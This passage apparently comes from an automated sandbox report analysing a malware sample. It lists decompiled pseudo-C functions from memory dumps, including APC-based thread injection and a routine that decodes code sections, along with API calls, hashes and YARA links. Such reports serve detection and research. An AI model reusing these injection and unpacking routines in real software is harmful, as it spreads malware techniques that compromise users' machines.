							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E00BB19D0(_t25) != 0) {
							 *0xbbd260 = 1; // executed
						}
						_t12 = E00BB17EE(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x00bba1e3
0x00bba1e9
0x00bba1ea
0x00bba1f6
0x00bba1fc
0x00bba203
0x00bba213
0x00bba218
0x00bba21f
0x00bba221
0x00bba226
0x00bba22c
0x00bba232
0x00bba23c
0x00bba240
0x00bba242
0x00bba247
0x00bba248
0x00bba249
0x00bba24e
0x00bba254
0x00bba25d
0x00bba25e
0x00bba263
0x00bba269
0x00bba275
0x00bba277
0x00bba277
0x00bba281
0x00bba281
0x00bba205
0x00bba207
0x00bba207
0x00bba28b

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00BB5C19,?), ref: 00BBA1F6
GetTickCount.KERNEL32 ref: 00BBA20A
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00BB5C19,?), ref: 00BBA226
SwitchToThread.KERNEL32(?,00000001,?,?,?,00BB5C19,?), ref: 00BBA22C
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00BBA249
Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,00BB5C19,?), ref: 00BBA263

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: 9c203c09e81a7894d03da71248f4c7c349849d75951f6e13965ffcbd185d61b9
Instruction ID: ba474347f898e17440070d0cc03e2f2b17abee411afc8a2c90b673ca5dd381d5
Opcode Fuzzy Hash: 9c203c09e81a7894d03da71248f4c7c349849d75951f6e13965ffcbd185d61b9
Instruction Fuzzy Hash: BF11A572A44304AFE710ABA4DC5AFAA7BD8EF44350F404665F945DB190EEF5D8008666

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C1F56, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E0C1F56(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e0c4140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6e0c1f6d
0x6e0c1f73
0x6e0c1f77
0x6e0c1f82
0x6e0c1f8a
0x6e0c1f93
0x6e0c1f97
0x6e0c1f9e
0x6e0c1fa5
0x6e0c1fa7
0x6e0c1fad
0x6e0c1f8a
0x6e0c1fb1

APIs

CreateThread.KERNELBASE ref: 6E0C1F6D
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E0C1F82
GetLastError.KERNEL32(00000000), ref: 6E0C1F8D
TerminateThread.KERNEL32(00000000,00000000), ref: 6E0C1F97
CloseHandle.KERNEL32(00000000), ref: 6E0C1F9E
SetLastError.KERNEL32(00000000), ref: 6E0C1FA7

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: e022c0f94afbfa8274dd5961ca0b0506162371b79c0d39c684f0ed94b72e647a
Instruction ID: 29338841f65164b63b5029247127f28ef4c322fe4039d2b6aa0cd005d35a61c6
Opcode Fuzzy Hash: e022c0f94afbfa8274dd5961ca0b0506162371b79c0d39c684f0ed94b72e647a
Instruction Fuzzy Hash: A7F05E33214A20BFDB115BE08C1CF9EBB69FF0EF41F114444F605A1140C73988119BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB17EE, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00BB17EE(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00BB7B6E();
				if(_t21 != 0) {
					_t59 =  *0xbbd25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0xbbd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xbbd164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00BB5077( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xbbd2a4; // 0x2a5a5a8
					if( *0xbbd25c > 5) {
						_t8 = _t26 + 0xbbe5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0xbbea15; // 0x44283a44
						_t27 = _t7;
					}
					E00BB5A39(_t27, _t27);
					_t31 = E00BB165F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0xbbd270 =  *0xbbd270 ^ 0x81bbe65d;
						_t32 = E00BB98E4(0x60);
						 *0xbbd32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xbbd32c; // 0x36195b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xbbd32c; // 0x36195b0
							 *_t51 = 0xbbe836;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xbbd238, 0, 0x43);
							 *0xbbd2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xbbd25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xbbd2a4; // 0x2a5a5a8
								_t13 = _t58 + 0xbbe55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xbbc2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00BB7EC1( ~_v8 &  *0xbbd270, 0xbbd00c); // executed
								_t42 = E00BB62D8(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E00BB8863(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00BB7780(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E00BB1E40(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xbbd160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E00BB13E3(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x00bb17ee
0x00bb17f9
0x00bb17fc
0x00bb17ff
0x00bb1802
0x00bb1809
0x00bb180b
0x00bb1817
0x00bb1819
0x00bb1819
0x00bb1822
0x00bb1828
0x00bb182d
0x00bb1847
0x00bb1853
0x00bb1855
0x00bb185a
0x00bb1864
0x00bb1864
0x00bb185c
0x00bb185c
0x00bb185c
0x00bb185c
0x00bb186b
0x00bb1878
0x00bb187f
0x00bb1884
0x00bb1884
0x00bb188c
0x00bb188f
0x00bb18b5
0x00bb18c1
0x00bb18c6
0x00bb18cb
0x00bb18cd
0x00bb18f9
0x00bb18fb
0x00bb18cf
0x00bb18d3
0x00bb18d8
0x00bb18dd
0x00bb18e4
0x00bb18ea
0x00bb18ef
0x00bb18f5
0x00bb18fc
0x00bb18fe
0x00bb1900
0x00bb190f
0x00bb1915
0x00bb191a
0x00bb191c
0x00bb194c
0x00bb194e
0x00bb191e
0x00bb191e
0x00bb1924
0x00bb1931
0x00bb1937
0x00bb1937
0x00bb193f
0x00bb1948
0x00bb194f
0x00bb1951
0x00bb1953
0x00bb195a
0x00bb1967
0x00bb196c
0x00bb1971
0x00bb1973
0x00bb1975
0x00000000
0x00000000
0x00bb1977
0x00bb197c
0x00bb197e
0x00bb1985
0x00bb1989
0x00bb198c
0x00bb19a1
0x00bb19a5
0x00bb19aa
0x00000000
0x00bb19aa
0x00bb198e
0x00bb1990
0x00000000
0x00000000
0x00bb1996
0x00bb199b
0x00bb199d
0x00bb199f
0x00000000
0x00000000
0x00000000
0x00bb199f
0x00bb1982
0x00bb1982
0x00bb1953
0x00bb1891
0x00bb1891
0x00bb1896
0x00bb19ac
0x00bb19b0
0x00bb19b8
0x00bb19b8
0x00000000
0x00bb19b0
0x00bb189c
0x00bb189f
0x00bb18a9
0x00bb18b0
0x00000000
0x00bb19c0
0x00bb19c0
0x00bb19c4
0x00bb19c8
0x00bb19c8

APIs

Part of subcall function 00BB7B6E: GetModuleHandleA.KERNEL32(4C44544E,00000000,00BB1807,00000000,00000000), ref: 00BB7B7D

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00BB1884

Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0

memset.NTDLL ref: 00BB18D3
RtlInitializeCriticalSection.NTDLL(03619570), ref: 00BB18E4

Part of subcall function 00BB1E40: memset.NTDLL ref: 00BB1E55
Part of subcall function 00BB1E40: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00BB1E89
Part of subcall function 00BB1E40: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00BB1E94

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00BB190F
wsprintfA.USER32 ref: 00BB193F

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: 28456368eead6355a9baea026d2d9bb3d764294556e9a7013e7e99e1a3f2338c
Instruction ID: 39cc15d981a2523cddfc96c9b44ab6755a8d4d3457b869349f69d794ca8c9cdd
Opcode Fuzzy Hash: 28456368eead6355a9baea026d2d9bb3d764294556e9a7013e7e99e1a3f2338c
Instruction Fuzzy Hash: 2851F371A01254AFDB20EBA8DCA5BFE77E8FB04700F9409A5F141E7261EAF4D905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BB546B, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00BB54C8
SysAllocString.OLEAUT32(00BB9595), ref: 00BB550C
SysFreeString.OLEAUT32(00000000), ref: 00BB5520
SysFreeString.OLEAUT32(00000000), ref: 00BB552E

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 8877cfe0c1747bc626161779a136c9f452452a7559f96b7415aacb7fc18ddb93
Instruction ID: 682b2cf3491c309a03d5efec615f74e274ff9ecad1e7257f865572dcd04857b7
Opcode Fuzzy Hash: 8877cfe0c1747bc626161779a136c9f452452a7559f96b7415aacb7fc18ddb93
Instruction Fuzzy Hash: E8311E71900549EFCB15DF98D8C4AEE7BF9EF18301B10445AE5069B250E7B1DA81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C1C4E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E0C1C4E(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6e0c4130;
				_t39 = E6E0C1FDA(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6e0c4140;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6e0c51a7; // 0x6e0c51a7
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6E0C15DC(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80, 0x400);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6e0c4140 = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x6e0c1c55
0x6e0c1c65
0x6e0c1c6a
0x6e0c1c6f
0x6e0c1c84
0x6e0c1c8b
0x6e0c1c90
0x6e0c1ca1
0x6e0c1ca4
0x6e0c1caa
0x6e0c1caf
0x6e0c1d5e
0x6e0c1cb5
0x6e0c1cb5
0x6e0c1cb9
0x6e0c1d26
0x6e0c1cbb
0x6e0c1cbb
0x6e0c1cbe
0x6e0c1cc0
0x6e0c1cc8
0x6e0c1ccb
0x6e0c1cce
0x6e0c1cd6
0x6e0c1cde
0x6e0c1cdf
0x6e0c1ce0
0x6e0c1ce7
0x6e0c1ce7
0x6e0c1d00
0x6e0c1d05
0x6e0c1d0e
0x6e0c1d15
0x6e0c1d18
0x6e0c1d1a
0x6e0c1d21
0x00000000
0x00000000
0x6e0c1cd3
0x6e0c1cd3
0x6e0c1d23
0x6e0c1d30
0x6e0c1d45
0x6e0c1d32
0x6e0c1d3b
0x6e0c1d40
0x6e0c1d56
0x6e0c1d56
0x6e0c1d65
0x6e0c1d6b

APIs

VirtualAlloc.KERNELBASE(00000000,6E0C1DAC,00003000,00000004,?,?,6E0C1DAC,00000000), ref: 6E0C1CA4
memcpy.NTDLL(?,?,6E0C1DAC,?,?,6E0C1DAC,00000000), ref: 6E0C1D3B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E0C1DAC,00000000), ref: 6E0C1D56

Strings

May 3 2021, xrefs: 6E0C1CD6

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: May 3 2021
API String ID: 4010158826-2742910968
Opcode ID: 24c23b93b3b81ec16247589b5034c93ddff692c5e859c699fbc2331d04e7a7dc
Instruction ID: 9308839205e066e38ce212282538a46440ed2f613ddb2d3b85cd7f7153ed52ac
Opcode Fuzzy Hash: 24c23b93b3b81ec16247589b5034c93ddff692c5e859c699fbc2331d04e7a7dc
Instruction Fuzzy Hash: 04319275E0061AAFDF00CFD9D884BDEB7B5FF09B08F108165E944BB244D771AA0A8B91

Uniqueness

Uniqueness Score: -1.00%

Function 00BB769A, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00BB769A(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00BB98E4(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xbbc2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xbbc2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00bb76a5
0x00bb76a9
0x00bb76ab
0x00bb76ac
0x00bb76b4
0x00bb76b4
0x00bb76b8
0x00000000
0x00000000
0x00bb76af
0x00bb76b0
0x00bb76b3
0x00bb76b3
0x00bb76c0
0x00bb76c5
0x00bb76cb
0x00bb76d3
0x00bb76d9
0x00bb76db
0x00bb76e0
0x00bb76e4
0x00bb76e6
0x00bb76e9
0x00bb76f0
0x00bb76f0
0x00bb76fa
0x00bb76fd
0x00bb76fe
0x00bb7700
0x00bb770c
0x00bb770c
0x00bb7719

APIs

StrChrA.SHLWAPI(?,00000020,00000000,036195AC,?,00BB1971,?,00BB1D89,036195AC,?,00BB1971), ref: 00BB76B4
StrTrimA.KERNELBASE(?,00BBC2A4,00000002,?,00BB1971,?,00BB1D89,036195AC,?,00BB1971), ref: 00BB76D3
StrChrA.SHLWAPI(?,00000020,?,00BB1971,?,00BB1D89,036195AC,?,00BB1971), ref: 00BB76DE
StrTrimA.SHLWAPI(00000001,00BBC2A4,?,00BB1971,?,00BB1D89,036195AC,?,00BB1971), ref: 00BB76F0

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 693e2f5d7b844192aae91bc529b4da16ce35e1d4df8b9f6bd999659f8ea02372
Instruction ID: 9f3da4534b5ad187c92dd8f94085c9fa6ec9c045819e1c0ff730aef7ded67d60
Opcode Fuzzy Hash: 693e2f5d7b844192aae91bc529b4da16ce35e1d4df8b9f6bd999659f8ea02372
Instruction Fuzzy Hash: 6101B5716497125FC2219F698C89F7BBFD8EB96B90F110598F846D7241DEE0CC02D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C1367, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E0C1367(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E0C1D6E(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e0c1370
0x6e0c1375
0x6e0c1383
0x6e0c1388
0x6e0c1388
0x6e0c138e
0x6e0c1393
0x6e0c1397
0x6e0c139b
0x6e0c139b
0x6e0c13a5
0x6e0c13ae

APIs

GetCurrentThread.KERNEL32 ref: 6E0C136A
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E0C1375
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E0C1388
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E0C139B

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: a42fa253dae3a7c4e480aaa8aed80ada3fb718cddced4bd54fa8bae7491acfcf
Instruction ID: 8e561207f88ee4aa2c0e7f32438c1a57872d2988a52e14f6bbe663c85d4142ee
Opcode Fuzzy Hash: a42fa253dae3a7c4e480aaa8aed80ada3fb718cddced4bd54fa8bae7491acfcf
Instruction Fuzzy Hash: 25E02B313166116BA60127A84C4CFAF77ACEF86B757110336F920C22D0CB748C0689B1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB86F0, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BB86F0(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00BB4EC8(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xbbd2a4; // 0x2a5a5a8
				_t4 = _t24 + 0xbbede0; // 0x3619388
				_t5 = _t24 + 0xbbed88; // 0x4f0053
				_t26 = E00BB1CCE( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xbbd2a4; // 0x2a5a5a8
						_t11 = _t32 + 0xbbedd4; // 0x361937c
						_t48 = _t11;
						_t12 = _t32 + 0xbbed88; // 0x4f0053
						_t52 = E00BB5115(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0xbbd2a4; // 0x2a5a5a8
							_t13 = _t35 + 0xbbee1e; // 0x30314549
							if(E00BB5DFD(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0xbbd25c - 6;
								if( *0xbbd25c <= 6) {
									_t42 =  *0xbbd2a4; // 0x2a5a5a8
									_t15 = _t42 + 0xbbec2a; // 0x52384549
									E00BB5DFD(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0xbbd2a4; // 0x2a5a5a8
							_t17 = _t38 + 0xbbee18; // 0x36193c0
							_t18 = _t38 + 0xbbedf0; // 0x680043
							_t40 = E00BB9D43(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0xbbd238, 0, _t52);
						}
					}
					HeapFree( *0xbbd238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00BB9D8B(_t54);
				}
				return _t45;
			}

0x00bb86f0
0x00bb8700
0x00bb8703
0x00bb870a
0x00bb870c
0x00bb870c
0x00bb870f
0x00bb8714
0x00bb871b
0x00bb8728
0x00bb872d
0x00bb8731
0x00bb873f
0x00bb874d
0x00bb8751
0x00bb87e2
0x00bb87e2
0x00bb8757
0x00bb8757
0x00bb875c
0x00bb875c
0x00bb8763
0x00bb876f
0x00bb8771
0x00bb8773
0x00bb8775
0x00bb877c
0x00bb878e
0x00bb8790
0x00bb8797
0x00bb8799
0x00bb87a0
0x00bb87ab
0x00bb87ab
0x00bb8797
0x00bb87b0
0x00bb87b5
0x00bb87bc
0x00bb87cc
0x00bb87da
0x00bb87dc
0x00bb87dc
0x00bb8773
0x00bb87ee
0x00bb87ee
0x00bb87f0
0x00bb87f5
0x00bb87f7
0x00bb87f7
0x00bb8802

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03619388,00000000,?,74B5F710,00000000,74B5F730), ref: 00BB873F
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,036193C0,?,00000000,30314549,00000014,004F0053,0361937C), ref: 00BB87DC
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00BB780E), ref: 00BB87EE

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c7dc82a5949298a772ac1c5fd6af66cfd220cdfc051209a08de779b93f7daa24
Instruction ID: d059822e5cbdc5b0c74254fc464c9143d944bfa9a8e7613f5f377411718e5add
Opcode Fuzzy Hash: c7dc82a5949298a772ac1c5fd6af66cfd220cdfc051209a08de779b93f7daa24
Instruction Fuzzy Hash: 3F316B32A00149AFDB11ABA5DD85EFA7BFDEB44704F1101A5B604AB161EBF0DE05DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9958, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00BB9958(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0xbbd340; // 0x3619918
				_push(0x800);
				_push(0);
				_push( *0xbbd238);
				if( *0xbbd24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0xbbd24c =  *0xbbd24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E00BBA28E(_t44, _t40);
						_t18 = E00BB1E09(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0xbbd24c < 5) {
								 *0xbbd24c =  *0xbbd24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
